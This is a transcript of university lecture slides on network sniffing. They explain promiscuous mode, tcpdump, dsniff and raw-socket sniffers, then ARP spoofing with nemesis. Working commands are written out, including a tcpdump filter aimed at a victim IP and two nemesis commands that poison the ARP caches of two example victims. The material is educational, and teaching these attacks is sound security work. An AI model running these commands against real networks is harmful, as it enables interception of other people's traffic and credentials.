nov 27, 2014 sangwook lee com850 computer hacking and security 0x440 network sniffing
TRANSCRIPT
Nov 27, 2014
Sangwook Lee
COM850 Computer Hacking and Secu-rity
0x440Network Sniffing
Table of Contents
• Network Sniffing
• Sniffing Tools
• ARP Spoofing
0X440 NETWORK SNIFFING
What is the Network Sniffing
The act of capturing pack-ets that aren’t necessarily meant for public viewing is
called SNIFFING
0X440 NETWORK SNIFFING
Two Sniffing Flows According to Network
• Non-switched network environment1. Setting the promiscuous mode 2. Packet-capturing
• Switched network environment1. ARP spoofing2. Packet-capturing
0X440 NETWORK SNIFFING
Non-switched vs. Switched Network
• The flow of traffic in a non-switched network (cont.)
It should be noted that step 3 and 4 can be reversed in or-der
0X440 NETWORK SNIFFING
Non-switched vs. Switched Network
• The flow of traffic in a non-switched network Step 1 Node A transmits a frame to Node CStep 2 Hub will broadcast this frame to active portSetp 3 Node B will receive the frame and will ex-amine the address in the frame. After determining that it is not the intended host, it will discard the frameStep 4 Node C will receive the frame and will ex-amine the address in the frame. After determining that it is the intended host. it will process the frame further
0X440 NETWORK SNIFFING
Non-switched vs. Switched Network
• The flow of traffic in a switched network (cont.)
How to generate Canary
0X440 NETWORK SNIFFING
Non-switched vs. Switched Network
• The flow of traffic in a switched networkStep 1 Node A transmits a frame to Node CStep 2 The switch will examine this frame and determine what the intended host is. It will then set up a connection between Node A and Node C so that they have a ‘private’ connectionSetp 3 Node C will receive the frame and will ex-amine the address. After determining that it is the intended host, it will process the frame further
0X440 NETWORK SNIFFING
Sniffing Non-switched Network
• For a host to be used as a sniffing agent,– NIC must be set to the promiscuous mode
After the promiscuous mode is set...
NIC no longer drop network frames which are addressed to
other hosts
0X440 NETWORK SNIFFING
Sniffing Non-switched Network
• Setting the promiscuous mode
$ sudo ifconfig eth0 promisc
0X440 NETWORK SNIFFING
Packet Capturing Tools
• Sniffers– tcpdump– dsniff
• Raw socket sniffer– raw_tcpsniff – pcap_sniff (with libpcap)– decode_sniff (with libpcap)
0X440 NETWORK SNIFFING
Sniffer: tcpdump
$ sudo tcpdump –X ‘ip host <victim IP>’
0X440 NETWORK SNIFFING
Sniffer: dsniff
$ sudo dsniff –n
0X440 NETWORK SNIFFING
Packet Capturing Tools
• Sniffers– tcpdump– dsniff
• Raw socket sniffer– raw_tcpsniff– pcap_sniff (with libpcap)– decode_sniff (with libpcap)
0X440 NETWORK SNIFFING
# Raw Socket
• Raw socket is an network socket that allows direct sending and receiving of Internet protocol packets without any protocol-specific transport layer for-matting
• Raw socket is specified by suing SOCK_RAW as the type
• There are multiple protocol options– IPPROTO_TCP, IPPROTO_UDP, IPROTO_ICMP
0X440 NETWORK SNIFFING
Raw Socket Sniffer: raw_tcpsniff
raw_tcpsniff.c
0X440 NETWORK SNIFFING
Raw Socket Sniffer: raw_tcpsniff
$ gcc –o raw_tcpsniff raw_tcpsniff.c
$ sudo ./raw_tcpsniff
0X440 NETWORK SNIFFING
Raw Socket Sniffer with Libpcap: pcap_sniff
pcap_sniff.c
0X440 NETWORK SNIFFING
Raw Socket Sniffer with Libpcap: pcap_sniff
$ gcc –o pcap_sniff pcap_sniff.c –lpcap
$ sudo ./pcap_sniff
0X440 NETWORK SNIFFING
Raw Socket Sniffer with Libpcap: decode_sniff
decode_sniff.c
0X440 NETWORK SNIFFING
Raw Socket Sniffer with Libpcap: decode_sniff
decode_sniff.c
0X440 NETWORK SNIFFINGRaw Socket Sniffer with Libpcap:
Decode_sniff
decode_sniff.c
0X440 NETWORK SNIFFING
Raw Socket Sniffer with Libpcap: decode_sniff
$ gcc –o decode_sniff decode_sniff.c –lpcap
$ sudo ./decode_sniff
0X440 NETWORK SNIFFING
Sniffing Switched Networks
• ARP spoofing
One of the basic operations of the Ethernet proto-col revolves around ARP (Address Resolution Proto-col) requests and replies. In general, when Node A wants to communicate with Node C on the network, it sends an ARP request. Node C will send an ARP reply which will include the MAC address. Even in a switched environment, this initial ARP request is sent in a broadcast manner. It is possible for Node B to craft and send an unsolicited, fake ARP reply to Node A. This fake ARP reply will specify that Node B has the MAC address of Node C. Node A will unwittingly send the traffic to Node B since it pro-fesses to have the intended MAC address.
0X440 NETWORK SNIFFING
Sniffing Switched Network
• ARP spoofing using NEMESIS (cont.)– Attacker• IP: 1.1.1.20• MAC: 00:00:00:BB:BB:BB
– Victim1• IP: 1.1.1.10• MAC: 00:00:00:AA:AA:AA
– Victim2• IP: 1.1.1.30• MAC: 00:00:00:CC:CC:CC
0X440 NETWORK SNIFFING
Sniffing Switched Network
• ARP spoofing using NEMESIS (cont.)
$ sudo nemesis arp –v –r –d eth0 –S 1.1.1.10 –D 1.1.1.30 -h 00:00:00:BB:BB:BB -m 00:00:00:CC:CC:CC -H 00:00:00:BB:BB:BB -M 00:00:00:CC:CC:CC
$ sudo nemesis arp –v –r –d eth0 –S 1.1.1.30 –D 1.1.1.10 -h 00:00:00:BB:BB:BB -m 00:00:00:AA:AA:AA -H 00:00:00:BB:BB:BB -M 00:00:00:AA:AA:AA
Attacker (System B) → Victim2 (System C)
Attacker (System B) → Victim1 (System A)
0X440 NETWORK SNIFFING
Sniffing Switched Network
• ARP spoofing using NEMESIS
ARP Cache of Victim1 (System A)
ARP Cache of Victim2 (System C)
the end